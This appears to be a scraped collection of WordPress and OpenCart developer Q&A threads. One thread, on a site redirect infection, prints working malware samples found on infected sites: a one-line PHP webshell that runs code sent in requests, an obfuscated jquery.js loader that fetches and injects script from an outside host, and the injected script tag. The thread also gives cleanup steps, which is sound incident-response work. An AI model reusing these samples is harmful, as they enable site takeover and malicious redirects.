I'm using the WordPress upload media tool within my plugin and there's unusual error that is going on, I get two iframes that overlap. I searched online and there's not much info out there, one that made most sense was that thickbox was included twice and that's causing the problem, but within my plugin code I have it included only once.
This is the code I'm using to open the window:
media-upload.php?type=image&TB_iframe=true&tab=library&width=640&height=640
and when I take of "TB_iframe=true" then I see the two iframes under each other, otherwise they overlap, only see double titles.
And this is the PHP code:
if (isset($_GET['page']) && ($_GET['page'] == 'add_images' || $_GET['page'] == 'add_slides')) {
add_action("admin_enqueue_scripts", "load_fixedly_media_upload_header");
}
function load_fixedly_media_upload_header() {
wp_enqueue_script('media-upload');
wp_enqueue_script('thickbox');
wp_register_script('my-fixedly-upload', WP_PLUGIN_URL . '/fixedly/scripts/admin.js', array('jquery','media-upload','thickbox'));
wp_enqueue_script('my-fixedly-upload');
wp_enqueue_style('thickbox');
}
Related
I found a weird bug, in cropping image in wordpress
I used WP_Customize_Cropped_Image_Control to crop image. In there I set the width 750 & height 500
that works well but that was showing error while cropping some other image
*It made me crazy, after spending so many hour, I realized that (the error and not showing cropping frame) it occur with the images
which have the same aspect ratio as I provided in WP_Customize_Cropped_Image_Control (if the aspect ratio matched then error occur)
if I don't provide aspect the ratio and set flex width and height then it works well
*Other thing I noticed that I have a wide image that is 1920 X 742
which takes the whole width of Crop Image modal of Wordpress, so there is also causing error (not showing cropping frame and showing error)
If I resize my browser window then It show the cropping frame and can crop the image without any error
After some long research, I understood that it is a known bug of a jQuery library that is used by Wordpress and this library has not been updated for a long time. There is a workaround but it is a bit tricky. If you really need it, here is the solution for the curious ones:
The file is /wp-includes/js/imgareaselect/jquery.imgareaselect.js
Copy your own version (do not make a change in core WP files) and put it like somewhere in your template directory for example a js directory. Find this code snippet:
imgWidth = $img.innerWidth();
imgHeight = $img.innerHeight();
change it to this
imgWidth = Math.ceil($img.innerWidth());
imgHeight = Math.ceil($img.innerHeight());
Then you should dequeue and deregister the core file and enqueue your version. In case you do not know how to do it, I also put it here for the ones who need it.
Put the code snippet in your functions.php file.
// change custom scripts example
add_action( 'wp_print_scripts', 'cleanup_scripts', PHP_INT_MAX);
add_action( 'wp_print_footer_scripts', 'cleanup_scripts', PHP_INT_MAX);
function cleanup_scripts() {
wp_deregister_script('imgareaselect');
wp_dequeue_script('imgareaselect');
wp_enqueue_script('imgareaselect', get_template_directory_uri() . '/js/jquery.imgareaselect.min.js', array('jquery'), '1.0', true);
}
'imgareaselect' is the handle of the file that is used by Wordpress core.
I also put the source here in case you want to dig deeper.
https://github.com/google/web-stories-wp/issues/8398
I've been fiddling quite a lot with an issue with the new Gutenberg editor in wordpress 5.x in which i experienced a white/blank screen when trying to edit a page.
What's weird is that I originally thought it was due to Yoast SEO (plugin) and an error with 'pluginSidebar', but disabling it didn't make a difference.
I also tried all the possible solutions I found, e.g.:
Delete browser cache
Delete server cache (W3TC)
Disable all plugins
Change theme (which actually solved it, but isn't a theme-issue (see answer)
I solved similar problem by deleting these lines. If you have similar expressions which change behavior of script's, it may cause problem. For my case, I deleted a function from function.php file:
function js_async_attr($tag)
{
# Add async to all remaining scripts
return str_replace(' src', ' async="async" src', $tag);
}
add_filter('script_loader_tag', 'js_async_attr', 10);
I've chosen to create a question and answer it myself as I've been bothered with this issue quite some time, and I'm hoping it might help some others.
After several attempts of fixing it and multiple searches I've finally found the error through trial-and-error, and the issue stems from an old "tip" (e.g. from here) for speed optimization in which you disabling the queuing of wp-embed.min.js (hook: wp-embed) such as below:
function my_deregister_scripts(){
wp_dequeue_script( 'wp-embed' );
}
add_action( 'wp_footer', 'my_deregister_scripts' );
However, disabling/dequeuing the wp-embed causes Gutenberg to malfunction and return a white screen!
Solution: If you have the above line of code in your functions.php then try to remove it, if you experience a white screen.
Anyone who can help me how to fix my site?
It is always redirecting to yetill.com. I searched about this site and i learned that it is a kind of malware.
Tried various solutions found on the net but still not solved.
Thanks.
Preliminary steps:
Backup everything
Check the file wp-includes/js/jquery/jquery.js - the first line should only contain a comment like /*! jQuery v1.... Delete anything before that line (you made a backup, right?)
Check your /wp-content/uploads directory for suspicious files. For us it was we had malicious files e.g. in this sub dir: /ultimatemember/temp/[random dir]/n.php - Delete those after making a backup.
Install WordFence WP plugin and scan your site
Double-check that wp-includes/js/jquery/jquery.js is still OK (it can be modified again)
Consider the WordFence option "Disable Code Execution for Uploads directory" to prevent future intrusions if that works for your site (test!).
Background:
We have the same problem. Wordfence noticed that the file wp-includes/js/jquery/jquery.js was modified on the server. Restoring it to the original version seemed to solve it. BUT, the file got infected quickly (hours?). So we do not know the source yet...
We found some suspicious code in /wp-content/uploads/ultimatemember/temp/[random dir]/n.php:
<?php file_put_contents('sdgsdfgsdg','<?php '.base64_decode($_REQUEST['q']));
include('sdgsdfgsdg'); unlink('sdgsdfgsdg'); ?>
That basically executes any PHP code from outside...
After deleting those files, the site did seemed back to normal (couple of hours).
We also noticed a suspicious <a> tag in the page source; but not sure about its relevance.
<a class="html-attribute-value html-resource-link" target="_blank"
href="https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4"
rel="noreferrer noopener">https://our.site/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4</a>
It seems that this is caused by the vulnerability of some plugins you might be using.
In my case it was the older version (prior to 2.22) of Ultimate Member plugin.
If you are using version 2.22 or earlier of this plugin, you should update this plugin immediately, and purge temp files. (https://wordpress.org/support/topic/malicious-files-in-ultimate-members-plugin/)
After that, search recently updated files with this command. (e.g. 15 days)
find ./ -type f -mtime -15
Chances are your WP jquery file and any files with name "header" is likely to be infected.
/wp-includes/js/jquery/jquery.js
/wp-contents/your-theme/header.php
..
Remove the following script in your infected header files.
<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
It looks like this is inserted right after opening head tag and right before closing head tag. Make sure you delete both.
Remove maliciously inserted script from infected Jquery file or just replace the file with clean one from other WP Core installations.
I think this should fix the issue.
You will have to do some troubleshooting. It is either your theme or one of your plugins that contains the malicious code.
Follow these steps:
Switch to a default theme like TwentySeventeen - If the issue
persists, it means it is not your theme.
Deactivate all your active plugins and check the website - The issue should go away.
Begin reactivating your plugins, clearing the cache after each reactivation
and checking your website - Whenever the issue shows up again, it is
that plugin that's the culprit and you cannot use that plugin.
Hope this helps.
jquery file was infected in my case. Just delete the code before /*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */ and make sure that all of your plugins are updated and the site is secure. Also chech the permissions of the files! That helps me in my case
We have the same error, these files were infected. This is the malicious code I've found in them.
wp-includes/js/jquery/jquery.js
(function() { "use strict"; var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()} })();
themes/yourtheme/header.php
<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>
This is what I found today after running securi scanner. Hopefully this helps someone because this one is a nasty one. It appears in my case to be affecting the following files:
wp-admin/install.php
wp-includes/js/jquery/jquery.js
wp-includes/theme-compat/header-embed.php
wp-includes/theme-compat/header.php
Whatever it was seemed to have gone ham on my wp-includes directory.
I do run Ultimate Member plugin and I noticed someone mentioned before that earlier versions of this plugin had vulnerabilities. I run a multi-site network, and also noticed that two of the registration forms on my sub-sites had the default role of Administrator (what plugin vendor would find that secure as a default registration option?) with the auto approve option enabled (no verification emails). Apparently activating this plugin in a network environment requires some extra thorough review on those registration and sign in forms.
Had the same issue. jquery was infected and had to be replaced with the original version. The hacker probably used ultimatemember backdoor to upload a php file and execute it. I had to clean up the plugin temp directory.
Another observation was that the hack was forcing modified jquery to load script, which address was loaded from http://src.eeduelements.com/get.php . This gives them the flexibility to rotate the ads.
sudo grep --include=\*.php -rnw . -e "<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script>"
that along with this answer below helped me clean my files. It affected all of my websites but now seems to still persist on the site that had ultimate member on it. Still working on it. This Php script was incredible though. thanks to the writer for sure.
PHP/SSH regex script/command to delete identical malware code from many files
This is the php from the above answer. I just swapped out the find portion with the malicious stuff redirecting to yetill.
<?php
//Enter it as it is and escape any single quotes
$find='<script type=\'text/javascript\' src=\'https://cdn.eeduelements.com/jquery.js?ver=1.0.8\'></script>';
echo findString('./',$find);
function findString($path,$find){
$return='';
ob_start();
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != "..") {
if(is_dir($path.'/'.$file)){
$sub=findString($path.'/'.$file,$find);
if(isset($sub)){
echo $sub.PHP_EOL;
}
}else{
$ext=substr(strtolower($file),-3);
if($ext=='php'){
$filesource=file_get_contents($path.'/'.$file);
$pos = strpos($filesource, $find);
if ($pos === false) {
continue;
} else {
//The cleaning bit
echo "The string '".htmlentities($find)."' was found in the file '$path/$file and exists at position $pos and has been removed from the source file.<br />";
$clean_source = str_replace($find,'',$filesource);
file_put_contents($path.'/'.$file,$clean_source);
}
}else{
continue;
}
}
}
}
closedir($handle);
}
$return = ob_get_contents();
ob_end_clean();
return $return;
}
?>
I am new to wordpress plugin development, but any how I have developed two shortcodes i.e. [MY_SHORTCODE] and [MY_SHORTCODE_MOBILE], both are working fine but now I want to do one enhancement in it, that is, I want to write a new shortcode which detect the device, if the detected device is mobile than I want to call the shortcode [MY_SHORTCODE_MOBILE] otherwise I want to call [MY_SHORTCODE]. How can I do this ? please help me guys .
you can do it via a plugin Mobile Detector
or if you want to create your own you can start by using mobile detection library(PHP)
mobile-detect
i got it your problem that you want to run short code base on browser or mobile device.
Download php file for mobile detect code and put below code where do you want to run short code
<?php
$useragent=$_SERVER['HTTP_USER_AGENT'];
if(preg_match('/copy paste mobile detect code here from detectmobilebrowser.php',substr($useragent,0,4)))
{
//header('Location: http://detectmobilebrowser.com/mobile');
// that code run for mobile device
echo do_shortcode("[MY_SHORTCODE_MOBILE]");
}
else{
// that code run for browser
echo do_shortcode("[MY_SHORTCODE]");
}
?>
I'm using opencart (version 1.5.1.3.1) for a client store, and am wondering what the best way to code it so I can have certain stylesheets added for certain routes.
For example, on my category page I'd like to have a different stylesheet to the default one, or one that will over ride the default styles with my custom sheet. I have use for this for more than one route obviously, and want to do this with as little edits required as possible, so as to reduce the amount of edits in the framework should I need to upgrade at any stage (and with opencart's well known random changes and bug fix releases this is quite probable)
Open catalog/controller/common/header.php
Right after the line protected function index() { on a new line put
$route = empty($this->request->get['route']) ? 'common/home' : $this->request->get['route'];
$css_file = str_replace('/', '_', $route) . '.css';
if(file_exists(DIR_TEMPLATE . $this->config->get('config_template') . '/stylesheet/' . $css_file)) {
$this->document->addStyle('catalog/view/theme/' . $this->config->get('config_template'). '/stylesheet/' . $css_file);
}
Then go to your current theme, and create a file in catalog/view/your-theme/stylesheet/ folder called product_category.css and put your styles in that. The stylesheets work off your route name except you replace the forward slash to an underscore followed by .css, ie common/home becomes common_home.css
Note that is is going to use the override method rather than replacing your default stylesheet